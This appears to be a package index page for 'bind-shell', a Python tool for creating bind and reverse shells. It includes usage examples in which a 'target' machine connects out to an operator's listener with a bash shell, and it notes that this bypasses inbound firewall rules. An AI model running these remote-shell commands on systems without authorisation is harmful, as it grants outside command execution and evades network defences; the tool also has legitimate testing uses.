A CLI for creating and connecting to bind shells and reverse shells. Zero external dependencies — built entirely on Python stdlib.
Project description
bind-shell 
A CLI for creating and connecting to bind shells and reverse shells. Zero external dependencies — built entirely on Python stdlib.
Install
Use pipx to install globally in an isolated python environment.
pipx install bind-shell
Usage
usage: bind-shell [-h] {server,client,listen,connect} ...
positional arguments:
{server,client,listen,connect}
server Bind shell: bind a port and execute commands from an incoming client
client Bind shell: connect to a server and send commands interactively
listen Reverse shell: bind a port and send commands to an incoming connector
connect Reverse shell: connect out to a listener and execute its commands
Pass --help to any positional argument for more detail.
Bind shell
The target runs server — it binds a port, logs the connection command, and waits. The operator runs client to connect in and issue commands.
# target
$ bind-shell server --shell bash
Bind-Shell WAN: bind-shell client 12.34.77.19 --port 4444 --password lvwsJLXjz0fhPtMVUQU6Ug
Bind-Shell LAN: bind-shell client 192.168.86.25 --port 4444 --password lvwsJLXjz0fhPtMVUQU6Ug
Bind-Shell Local: bind-shell client localhost --port 4444 --password lvwsJLXjz0fhPtMVUQU6Ug
# operator (use the connection string logged by the server)
$ bind-shell client 12.34.77.19 --port 4444 --password lvwsJLXjz0fhPtMVUQU6Ug
Connected: 12.34.77.19:4444
admin@server:~$
Reverse shell
The operator runs listen — it binds a port, logs the connection command, and waits. The target runs connect to call back out, bypassing inbound firewall rules.
# operator
$ bind-shell listen
Reverse-Shell WAN: bind-shell connect 12.34.77.19 --port 4444 --password nYA9pFabJ1ojR2ZfyQHabA
Reverse-Shell LAN: bind-shell connect 192.168.86.26 --port 4444 --password nYA9pFabJ1ojR2ZfyQHabA
Reverse-Shell Local: bind-shell connect localhost --port 4444 --password nYA9pFabJ1ojR2ZfyQHabA
# target (use the connection string logged by the listener)
$ bind-shell connect 12.34.77.19 --port 4444 --password nYA9pFabJ1ojR2ZfyQHabA --shell bash
Connected: 12.34.77.19:4444
user@target:~$
Type exit and/or Ctrl + C to close a session.
TLS encryption
Pass --tls to encrypt traffic. Like HTTPS, this uses one-way TLS: only the listening side (server or listen) presents a certificate; the connecting side (client or connect) accepts it without verification and does not need a certificate of its own.
Generate a self-signed certificate on the listening machine before starting:
$ openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes
Bind shell with TLS:
# target
$ bind-shell server --tls --cert cert.pem --key key.pem
# operator (connection string is logged by the server, including --tls)
$ bind-shell client 12.34.77.19 --port 4444 --password <password> --tls
Reverse shell with TLS:
# operator
$ bind-shell listen --tls --cert cert.pem --key key.pem
# target (connection string is logged by the listener, including --tls)
$ bind-shell connect 12.34.77.19 --port 4444 --password <password> --tls
Both sides must use --tls together — a TLS listener and a plain client will hang, since the listener waits for a TLS handshake that never arrives.
Dev Prerequisites
- python >=3.10
- pipx, an optional tool for prerequisite installs
- poetry (install globally with
pipx install poetry) - flake8 (install globally with
pipx install flake8)- flake8-bugbear extension (install with
pipx inject flake8 flake8-bugbear) - flake8-naming extension (install with
pipx inject flake8 pep8-naming)
- flake8-bugbear extension (install with
- black (install globally with
pipx install black) - pre-commit (install globally with
pipx install pre-commit) - just, a Justfile command runner
Updating python version
- Update python version in
Dev Prerequisitesabove - Update [tool.poetry.dependencies] section of
pyproject.toml - Update pyupgrade hook in
.pre-commit-config.yaml - Update python version in
.gitlab-ci.yml
Justfile Targets
install: installs poetry dependencies and pre-commit git hooksupdate_boilerplate: fetches and applies updates from the boilerplate remotetest: runs pytest with test coverage report
Boilerplate
This project tracks the pyplate boilerplate via the boilerplate git remote. Run just update_boilerplate to pull latest changes. NOTE: keep the boilerplate remote history intact to successfully merge future updates.
Release history Release notifications | RSS feed
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Source Distribution
Built Distribution
Filter files by name, interpreter, ABI, and platform.
If you're not sure about the file name format, learn more about wheel file names.
Copy a direct link to the current filters
File details
Details for the file bind_shell-0.1.6rc23.tar.gz.
File metadata
- Download URL: bind_shell-0.1.6rc23.tar.gz
- Upload date:
- Size: 7.2 kB
- Tags: Source
- Uploaded using Trusted Publishing? No
- Uploaded via: poetry/2.4.1 CPython/3.13.13 Linux/5.15.154+
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
af953e9c129abe261fa2e6889a94d2fb258f1bb511180fd11322f8683bb8792c
|
|
| MD5 |
72869a174be57fa5077782c66d8358a4
|
|
| BLAKE2b-256 |
fb552b179584540a5cd6f489b3c5d4ee707f9144bc1ca9a4f9e3938e40d51a9d
|
File details
Details for the file bind_shell-0.1.6rc23-py3-none-any.whl.
File metadata
- Download URL: bind_shell-0.1.6rc23-py3-none-any.whl
- Upload date:
- Size: 7.2 kB
- Tags: Python 3
- Uploaded using Trusted Publishing? No
- Uploaded via: poetry/2.4.1 CPython/3.13.13 Linux/5.15.154+
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
ff2a73b181bf70c110475f451ca781a9d3d0d14e9b1b96821503b54768d3a1a1
|
|
| MD5 |
9d0e649f94e1bb07b4d07b5a5cf2164c
|
|
| BLAKE2b-256 |
ed334ab8f0bf579d0f6d4347fc4420e9cbd93ecc1ab6e5ffbd8497352dff80bb
|
